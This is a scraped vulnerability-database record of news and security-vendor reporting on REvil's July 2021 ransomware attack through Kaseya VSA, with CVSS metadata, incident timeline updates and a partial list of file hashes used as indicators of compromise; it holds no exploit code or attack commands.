REvil Used 0-Day in Kaseya Ransomware Attack, Demands $70 Million Ransom

2021-07-05T05:22:00

Description

[![Kaseya Ransomware Attack](https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s728-e1000/Kaseya-Ransomware-Attack.jpg)](<https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s0/Kaseya-Ransomware-Attack.jpg>) Amidst the massive [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) that triggered an infection chain compromising thousands of businesses on Friday, new details have emerged about how the notorious Russia-linked REvil cybercrime gang may have pulled off the unprecedented hack. The Dutch Institute for Vulnerability Disclosure (DIVD) on Sunday [revealed](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) it had alerted Kaseya to a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) that it said were being exploited as a conduit to deploy ransomware. The non-profit entity said the company was in the process of resolving the issues as part of a coordinated vulnerability disclosure when the July 2 attacks took place. More specifics about the flaws were not shared, but DIVD chair Victor Gevers [hinted](<https://twitter.com/0xDUDE/status/1411478505641099265>) that the zero-days are trivial to exploit. At least 1,000 businesses are said to have been affected by the attacks, with victims identified in no less than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, according to ESET. [Kaseya VSA](<https://www.kaseya.com/products/vsa/>) is a cloud-based IT management and remote monitoring solution for managed service providers (MSPs), offering a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access via two-factor authentication. ### REvil Demands $70 Million Ransom Active since April 2019, [REvil](<https://attack.mitre.org/software/S0496/>) (aka Sodinokibi) is best known for [extorting $11 million](<https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html>) from the meat-processor JBS early last month, with the ransomware-as-a-service business accounting for about 4.6% of attacks on the public and private sectors in the first quarter of 2021. [![Kaseya Ransomware Attack](https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s728-e1000/revil-ransomware-blog.jpg)](<https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s0/revil-ransomware-blog.jpg>) The group is now asking for a record $70 million ransom payment to publish a universal decryptor that can unlock all systems that have been crippled by file-encrypting ransomware. "On Friday (02.07.2021) we launched an attack on MSP providers. More than a million systems were infected. If anyone wants to negotiate about universal decryptor – our price is 70,000,000$ in BTC and we will publish publicly decryptor that decrypts files of all victims, so everyone will be able to recover from attack in less than an hour," the REvil group posted on their dark web data leak site. [![Kaseya Ransomware Attack](https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s728-e1000/ransomware-attack.jpg)](<https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s0/ransomware-attack.jpg>) Kaseya, which has enlisted the help of FireEye to help with its investigation into the incident, [said](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) it intends to "bring our SaaS data centers back online on a one-by-one basis starting with our E.U., U.K., and Asia-Pacific data centers followed by our North American data centers." On-premises VSA servers will require the installation of a patch prior to a restart, the company noted, adding it's in the process of readying the fix for release on July 5. ### CISA Issues Advisory The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [issue an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>), urging customers to download the [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that Kaseya has made available to identify any indicators of compromise (IoC), enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network. "Less than ten organizations [across our customer base] appear to have been affected, and the impact appears to have been restricted to systems running the Kaseya software," Barry Hensley, Chief Threat Intelligence Officer at Secureworks, told The Hacker News via email. "We have not seen evidence of the threat actors attempting to move laterally or propagate the ransomware through compromised networks. That means that organizations with wide Kaseya VSA deployments are likely to be significantly more affected than those that only run it on one or two servers." By compromising a software supplier to target MSPs, who, in turn, provide infrastructure or device-centric maintenance and support to other small and medium businesses, the development once again underscores the importance of securing the software supply chain, while also highlighting how hostile agents continue to advance their financial motives by combining the twin threats of supply chain attacks and ransomware to strike hundreds of victims at once. "MSPs are high-value targets — they have large attack surfaces, making them juicy targets to cybercriminals," said Kevin Reed, chief information security officer at Acronis. "One MSP can manage IT for dozens to a hundred companies: instead of compromising 100 different companies, the criminals only need to hack one MSP to get access to them all." Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:5B336156927E228EFBD090418D063D2D", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "REvil Used 0-Day in Kaseya Ransomware Attack, Demands $70 Million Ransom", "description": "[![Kaseya Ransomware Attack](https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s728-e1000/Kaseya-Ransomware-Attack.jpg)](<https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s0/Kaseya-Ransomware-Attack.jpg>)\n\nAmidst the massive [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) that triggered an infection chain compromising thousands of businesses on Friday, new details have emerged about how the notorious Russia-linked REvil cybercrime gang may have pulled off the unprecedented hack.\n\nThe Dutch Institute for Vulnerability Disclosure (DIVD) on Sunday [revealed](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) it had alerted Kaseya to a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) that it said were being exploited as a conduit to deploy ransomware. The non-profit entity said the company was in the process of resolving the issues as part of a coordinated vulnerability disclosure when the July 2 attacks took place.\n\nMore specifics about the flaws were not shared, but DIVD chair Victor Gevers [hinted](<https://twitter.com/0xDUDE/status/1411478505641099265>) that the zero-days are trivial to exploit. At least 1,000 businesses are said to have been affected by the attacks, with victims identified in no less than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, according to ESET.\n\n[Kaseya VSA](<https://www.kaseya.com/products/vsa/>) is a cloud-based IT management and remote monitoring solution for managed service providers (MSPs), offering a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access via two-factor authentication.\n\n### REvil Demands $70 Million Ransom\n\nActive since April 2019, [REvil](<https://attack.mitre.org/software/S0496/>) (aka Sodinokibi) is best known for [extorting $11 million](<https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html>) from the meat-processor JBS early last month, with the ransomware-as-a-service business accounting for about 4.6% of attacks on the public and private sectors in the first quarter of 2021.\n\n[![Kaseya Ransomware Attack](https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s728-e1000/revil-ransomware-blog.jpg)](<https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s0/revil-ransomware-blog.jpg>)\n\nThe group is now asking for a record $70 million ransom payment to publish a universal decryptor that can unlock all systems that have been crippled by file-encrypting ransomware.\n\n\"On Friday (02.07.2021) we launched an attack on MSP providers. More than a million systems were infected. If anyone wants to negotiate about universal decryptor \u2013 our price is 70,000,000$ in BTC and we will publish publicly decryptor that decrypts files of all victims, so everyone will be able to recover from attack in less than an hour,\" the REvil group posted on their dark web data leak site.\n\n[![Kaseya Ransomware Attack](https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s728-e1000/ransomware-attack.jpg)](<https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s0/ransomware-attack.jpg>)\n\nKaseya, which has enlisted the help of FireEye to help with its investigation into the incident, [said](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) it intends to \"bring our SaaS data centers back online on a one-by-one basis starting with our E.U., U.K., and Asia-Pacific data centers followed by our North American data centers.\"\n\nOn-premises VSA servers will require the installation of a patch prior to a restart, the company noted, adding it's in the process of readying the fix for release on July 5.\n\n### CISA Issues Advisory\n\nThe development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [issue an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>), urging customers to download the [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that Kaseya has made available to identify any indicators of compromise (IoC), enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n\"Less than ten organizations [across our customer base] appear to have been affected, and the impact appears to have been restricted to systems running the Kaseya software,\" Barry Hensley, Chief Threat Intelligence Officer at Secureworks, told The Hacker News via email.\n\n\"We have not seen evidence of the threat actors attempting to move laterally or propagate the ransomware through compromised networks. That means that organizations with wide Kaseya VSA deployments are likely to be significantly more affected than those that only run it on one or two servers.\"\n\nBy compromising a software supplier to target MSPs, who, in turn, provide infrastructure or device-centric maintenance and support to other small and medium businesses, the development once again underscores the importance of securing the software supply chain, while also highlighting how hostile agents continue to advance their financial motives by combining the twin threats of supply chain attacks and ransomware to strike hundreds of victims at once.\n\n\"MSPs are high-value targets \u2014 they have large attack surfaces, making them juicy targets to cybercriminals,\" said Kevin Reed, chief information security officer at Acronis. \"One MSP can manage IT for dozens to a hundred companies: instead of compromising 100 different companies, the criminals only need to hack one MSP to get access to them all.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-07-05T05:22:00", "modified": "2021-07-06T04:52:17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-30116"], "immutableFields": [], "lastseen": "2022-05-09T12:39:22", "viewCount": 1331, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:923F0E8E-CF44-416D-A421-F2177898261A", "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238"]}, {"type": "avleonov", "idList": ["AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0946"]}, {"type": "cve", "idList": ["CVE-2021-30116", "CVE-2021-30117"]}, {"type": "hivepro", "idList": ["HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3"]}, {"type": "krebs", "idList": ["KREBS:6C9A4C86453CF1F4DA06688B3CC1E186"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:EB242DD11B13A86E44E4325F83689782"]}, {"type": "nessus", "idList": ["KASEYA_9_5_7_2994.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2"]}, {"type": "securelist", "idList": ["SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6"]}, {"type": "thn", "idList": ["THN:1812C7168898D0993D0783FDC775739F", "THN:6141B56028352C293B8E6D7F0948C55C"]}, {"type": "threatpost", "idList": ["THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:923F0E8E-CF44-416D-A421-F2177898261A"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0946"]}, {"type": "cve", "idList": ["CVE-2021-30116"]}, {"type": "hivepro", "idList": ["HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3"]}, {"type": "krebs", "idList": ["KREBS:6C9A4C86453CF1F4DA06688B3CC1E186"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EB242DD11B13A86E44E4325F83689782"]}, {"type": "nessus", "idList": ["KASEYA_9_5_7_2994.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2"]}, {"type": "securelist", "idList": ["SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6"]}, {"type": "thn", "idList": ["THN:1812C7168898D0993D0783FDC775739F", "THN:6141B56028352C293B8E6D7F0948C55C"]}, {"type": "threatpost", "idList": ["THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-30116", "epss": "0.935460000", "percentile": "0.985370000", "modified": "2023-03-17"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1659988328, "score": 1659910820, "epss": 1679098904}, "_internal": {"score_hash": "cf663381bbb2ffad259b9d5d4e15d7d0"}}

{"malwarebytes": [{"lastseen": "2021-07-10T08:32:15", "description": "**Malwarebytes does not use Kaseya products**. Malwarebytes detects the REvil ransomware used in this attack as [Sodinokibi](<https://blog.malwarebytes.com/detections/ransom-sodinokibi/>). \n\n### Latest updates\n\n * July 7, 8:30 am, Kaseya **VSA SaaS platform still offline**, not updated as planned\n * July 6, 3:40 pm, **malspam** using **fake Kaseya security update**\n * July 6, 3:15 am, Malwarebytes telemetry reveals **global scale** of the attack\n * July 6, 2:45 am, **Ransom demand drops to $50 million**, REvil branded "terrorists"\n * July 5, 5:00 am, Kaseya flaw part of larger **structural weakness in admin tools**\n * July 5, 4:30 am, Kaseya releases **compromise detection tool**\n * July 4, 8:50 pm, **REvil asks for $70 million**\n * July 4, 4:00 pm, Malwarebytes telemetry shows **surge in REvil detections**\n * July 4, 5:00 am, "**Thousands affected**", zero-day blamed\n * July 3, Two MSPs named, **hundreds of Coop stores closed**\n * July 2, **Shutdown Kaseya VSA** immediately\n * **IOCs**\n\n### Shutdown Kaseya VSA immediately\n\nA severe ransomware attack reportedly taking place now against the popular Remote Monitoring and Management software tool Kaseya VSA has forced Kaseya into offering urgent advice: **Shutdown VSA servers immediately**.\n\n\u201cWe are experiencing a potential attack against the VSA that has been limited to a small \nnumber of on-premise customers only as of 2:00 PM EDT today,\u201d [Kaseya wrote on Friday afternoon](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>).\n\n> \u201cWe are in the process of investigating the root cause of the incident with an abundance of caution but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us.\n> \n> It\u2019s critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.\u201d\n\nThe attack is reportedly delivered through a Kaseya VSA auto-update that maliciously pushes the Revil ransomware onto victims\u2019 machines. Kaseya is a popular software developed for Managed Service Providers that provide remote IT support and cybersecurity services for small- to medium-sized businesses that often cannot afford to hire full-time IT employees, due to their limited size or budgets.\n\nComplicating the attack is the fact that, [according to cybersecurity researcher Kevin Beaumont](<https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b>), the malicious update carries administrator rights for clients\u2019 systems, \u201cwhich means that Managed Service Providers who are infected then infect their client\u2019s systems.\u201d \n\nFor a company that says it has 40,000 customers, this could be a disaster. \n\nDuring the attack, the cybercriminals reportedly shut off administrative access to VSA, and several protections within Microsoft Defender are disabled, including Real-Time Monitoring, Script Scanning, and Controlled Folder Access.\n\nA screenshot from Malwarebytes reveals a ransom note delivered to an infected Windows machine. In the note, attackers warn:\n \n \n \"|---=== Welcome. Again. ===--- \n \n [-] Whats HapPen? [-] \n \n Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 7pc78r01. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you can't return your data (NEVER).\"\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/REvil_wallpaper_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/REvil_wallpaper_.png> \"\" )\n\nMalwarebytes customers are currently protected from REvil, as shown in the screenshots below, and Malwarebytes is committed to continuing this protection. (Malwarebytes detects REvil as [Sodinokibi](<https://blog.malwarebytes.com/detections/ransom-sodinokibi/>))\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/Detections_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/Detections_.png> \"\" )\n\nWe will update this post with more information as it becomes available, but the immediate guidance from Kaseya cannot be overstated: Shutdown VSA servers immediately.\n\n### Update July 3, 2021\n\nKaseya has released a new [statement](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>) confirming they were the victim of a sophisticated cyberattack. At this time they are still urging customers to keep their on-premise VSA servers offline.\n\n[According to Bloomberg](<https://www.bloomberg.com/news/articles/2021-07-02/russia-linked-group-hacks-about-200-businesses-with-ransomware>) two of the affected managed service providers (MSPs) are Synnex Corp. and Avtex LLC. While Kaseya is a US-based company, some of of the MSPs' customers are businesses in Europe. [According to the BBC](<https://www.bbc.com/news/technology-57707530>), Swedish supermarket chain Coop had to close more than 400 stores on Friday after the point-of-sale terminals and checkouts stopped working.\n\nVictims of this attack would have downloaded a malicious update called 'Kaseya VSA Agent HotFix' which was in fact meant to disable Windows Defender and push the file encryptor payload.\n\n### Update July 4, 2021, 5:00 am, PT\n\nMore details of the vast scope of the attack have emerged. Huntress has been maintaining a comprehensive [Reddit thread](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) on the incident since Friday. In an accompanying blog post, the organization says it is tracking about 30 MSPs in four continents "where Kaseya VSA was used to encrypt well over 1,000 businesses".\n\nOne of the affected organizations is St Peter's School, Cambridge, New Zealand, which has [confirmed](<https://www.facebook.com/STPETERSschNZ/posts/3987857927980037>) that it is one of [eleven schools](<https://www.nzherald.co.nz/nz/worldwide-ransomware-attack-st-peters-college-and-10-other-schools-hit-by-us-cyber-attack/JACHAD3OPGUOF7ZIF4PJXDPICA/#:~:text=The%20effects%20of%20a%20cyber,businesses%20and%20crippling%20computer%20networks.>) in the country affected by this supply-chain attack.\n\nSecurity company HuntressLabs has [analyzed](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) the original attack vector and believes a REvil/Sodinokibi affiliate exploited a zero-day for an authentication bypass in the Kaseya's web interface.\n\nToday, Victor Gevers of the Dutch Institute for Vulnerability Disclosure (DIVD) revealed on Twitter that it was in a "coordinated vulnerability disclosure process" with Kaseya at the time of the attack. \n\n> Technically it was a zero-day. We were in a coordinated vulnerability disclosure process with the vendor while this happened. The CVEs were ready to be published; the patches were made and prepared for distribution, and we mapped all online instances to help speed up the process.\n> \n> -- Victor Gevers (@0xDUDE) [July 3, 2021](<https://twitter.com/0xDUDE/status/1411466263411544064?ref_src=twsrc%5Etfw>)\n\nIn other words, Kaseya was aware of a problem and it was actively working to fix it. According to Gevers, this explains why on-premise version of VSA was vulnerable and the SaaS version was not. It seems that, sensibly, the SaaS version of VSA receives patches before the on-premise version.\n\nIt seems the attack was remarkably well timed. Had that process moved a little more quickly, infosec folks would now be enjoying their weekends and we'd be writing about what might have been, rather about what Gevers describes as "the single largest ransomware spree in history". \n\nGiven the way 2021 is unfolding, we can't help wondering how long it will keep that title.\n\n### Update: July 4, 4:00 pm, PT\n\nMalwarebytes' telemetry shows a major increase in [Ransom.Sodinokibi](<https://blog.malwarebytes.com/detections/ransom-sodinokibi/>) (REvil) detections and not just in the US. In fact, we have a number of hits in India, France, Chile, Taiwan, Australia, Colombia and Argentina.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/stats_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/stats_.png> \"\" )\n\n### Update: July 4, 8:50 pm, PT\n\nThe REvil gang has claimed the attack on MSPs and is asking for $70M in exchange for a universal decryptor. In a new post on their 'Happy Blog' hosted on the dark web, they say that more than a million systems were infected. They also mention that the universal decryptor would help recover from the attack in less than an hour. Both claims are highly controversial.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/blog.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/blog.png> \"\" )\n\n### Update: July 5, 4:30 am, PT\n\nKaseya has created a [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that can be download from the company's Box account. The tool will scan VSA servers or managed endpoints and determine whether any indicators of compromise (IoC) are present. However, Kaseya says its customers should [keep VSA turned off for now](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-3rd-2021>): \n\n> All on-premises VSA Servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture. \n\nCado Security has created a GitHub repository of [tools for DFIR professionals](<https://github.com/cado-security/DFIR_Resources_REvil_Kaseya>) who are dealing with the fallout from the attack.\n\n### Update: July 5, 4:45 am, PT\n\nDIVD reveals that Kaseya's instruction to shutdown VSA servers, and the subsequent efforts of organizations like theirs has drastically reduced the number of [Kaseya VSA instances that are reachable from the internet](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) from "over 2,200 to less than 140" in 48 hours.\n\nThe organization also sheds a little more light on the root cause of the incident, saying "DIVD researcher, has previously identified a number of the zero-day vulnerabilities [[CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>)] which are currently being used in the ransomware attacks." As we explained in an earlier update, DIVD was in the process of working with Kaseya to resolve the vulnerabilities when REvil struck. "Unfortunately, we were beaten by REvil in the final sprint."\n\nOminously, it explains that this is part of a broader effort looking at the administration interfaces of tools used for system administration, saying: "we spotted a trend where more and more of the products that are used to keep networks safe and secure are showing structural weaknesses."\n\n### Update: July 6, 2:45 am, PT\n\nReuters [reports](<https://www.reuters.com/technology/hackers-demand-70-million-liberate-data-held-by-companies-hit-mass-cyberattack-2021-07-05/>) that the REvil affiliate behind the attack "has indicated a willingness to temper their demands in private conversations with a cybersecurity expert and with Reuters." According to the news organization, the attackers told Jack Cable of the Krebs Stamos Group, that it was prepared to lower the asking price for a universal decryptor from $70 million to $50 million. A universal decryptor could be used to free all of the victims\u2014all the customers of Kaseya's customers\u2014and save the attackers the bother of negotiating with each of up to 1,500 victims separately. \n\nRansomware gangs typically negotiate with one, or a small number of victims at a time. The REvil affiliate behind this attack may simply be unequipped to communicate with so many victims. They may also be wary of creating thousands of separate 'paper trails' on the Bitcoin blockchain, since cryptocurrency payments are where recent law enforcement efforts seem to have focussed. About a month ago, the DOJ [recovered the majority of the ransom](<https://blog.malwarebytes.com/malwarebytes-news/2021/06/doj-recovers-pipeline-ransom-signals-more-aggressive-approach-to-cybercrime/>) paid in the Colonial Pipeline attack. A week later, police in Ukraine [arrested several individuals](<https://blog.malwarebytes.com/malwarebytes-news/2021/06/clop-stopped-ransomware-gang-loses-tesla-and-other-treasures-in-police-raid/>) believed to be engaged in money laundering for the Cl0p ransomware group.\n\nThe question now, is whether Kaseya will pay. Reuters reports that in an interview with Kaseya CEO Fred Voccola, he responded to a question about whether the company would pay by saying "I can't comment 'yes,' 'no,' or 'maybe' \u2026 No comment on anything to do with negotiating with terrorists in any way."\n\n### Update: July 6, 3:15 am, PT\n\nMalwarebytes Threat Intelligence has [released an image](<https://twitter.com/MBThreatIntel/status/1412153267308486657>) showing the global scale of the event. Telemetry from Malwarebytes reveals detections for REvil on four continents following Friday's attack.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/global-impact-of-kaseya-attack-600x307.jpg)REvil/Sodinokibi detections following the Kaseya attack\n\n### Update: July 6, 3:40 pm, PT\n\nMalwarebytes Threat Intelligence has seen a malicious spam campaign trying to take advantage of the Kaseya VSA attack. The email asks recipients to "please install the update from Microsoft to protect against ransomware" and a carries an attachment called `SecurityUpdates.exe`.\n\n> A [#malspam](<https://twitter.com/hashtag/malspam?src=hash&ref_src=twsrc%5Etfw>) campaign is taking advantage of Kaseya VSA [#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) attack to drop [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>). \nIt contains an attachment named "SecurityUpdates.exe" as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability! [pic.twitter.com/0nIAOX786i](<https://t.co/0nIAOX786i>)\n> \n> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [July 6, 2021](<https://twitter.com/MBThreatIntel/status/1412518446013812737?ref_src=twsrc%5Etfw>)\n\n### Update: July 7, 8:30 am, PT\n\nKaseya has updated its [incident page](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) to explain that its planned update to the Kaseya VSA SaaS platform has still not taken place, due to an unspecified issue.\n\n> \u2026during the deployment of the VSA update an issue was discovered that has blocked the release. We have not yet been able to resolve the issue \n\nThe SaaS platform's continued unavailability is a mystery. Kaseya maintains that unlike the on-premises version of its VSA product, the SaaS platform was not vulnerable to the zero-day issue used to launch Friday's attack. However, the SaaS platform was taken offline as a precaution and will remain so until it can be updated.\n\n### Indicators of Compromise (IoCs)\n\nLoader\n \n \n df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e \n dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f \n d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 \n 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 \n 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 \n 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e\n\nREvil/Sodinoki DLL\n \n \n d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 \n d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f \n cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 \n 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 \n 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f \n 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd\n\nFile paths\n \n \n C:\\kworking\\agent.exe \n 